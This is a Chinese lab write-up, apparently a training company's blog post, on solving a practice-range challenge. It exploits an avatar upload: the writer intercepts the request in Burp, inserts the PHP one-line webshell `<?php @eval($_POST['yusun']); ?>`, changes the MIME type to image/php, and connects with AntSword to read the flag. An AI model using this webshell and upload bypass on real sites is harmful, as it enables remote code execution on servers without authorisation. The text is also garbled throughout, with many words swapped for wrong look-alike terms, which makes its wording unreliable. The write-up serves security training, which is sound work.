关于网络安全:记某一次靶场通关记录渗透小白尝试有惊喜

某靶场题目的通关记录,反正是不晓得叫啥~

关上页面之后,

在右上角这一块有注册和登录

那没的说,有这个,必然是先注册登录一波。

登录之后跳转到集体核心,

看到有一个批改头像的中央~

接下来……

上图片马还是间接上一句话?

嗯……要不还是来个一句话试试先~

间接小手点一点插件,发现是PHP的脚本语言。

来个PHP的一句话马~

到 位 了~

尝试看看能不能间接下马,然而…

那就关上BP来拦包~

上传个失常的图片抓个包看看~

发现内容是加密传输的,那就…… 整上

保留后面的这一段,前面咱们间接写上一句话马:

image=data:image/jpeg;,

所以这一段内容为:

image=data:image/jpeg;,<?php @eval($_POST[‘yusun’]); ?>

接下来,须要更改一下类型,

把image/jpeg 改为 image/php,

使其当成php存储

而后把一句话马的内容加密

将数据包里的原内容删除,

替换为咱们加密后的内容

点击发送数据包。

通过响应包发现有个保留门路,

关上蚁剑尝试连贯一下

将响应包所返回门路中的反斜杠去掉,

拼接URL,填入明码,测试连贯~

哎嘿,绿色就是难看。

在目录外面找到了Flag文件,复制内容,提交~

就很perfect~相当完满。

后续将给大家带来更多靶场实操案例,更多浸透测试干货继续关注雨笋教育小编

*本文章仅供技术交换分享,请勿做未受权守法攻打,雨笋教育不负任何责任。具体请参考《网络安全法》。

评论

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

这个站点使用 Akismet 来减少垃圾评论。了解你的评论数据如何被处理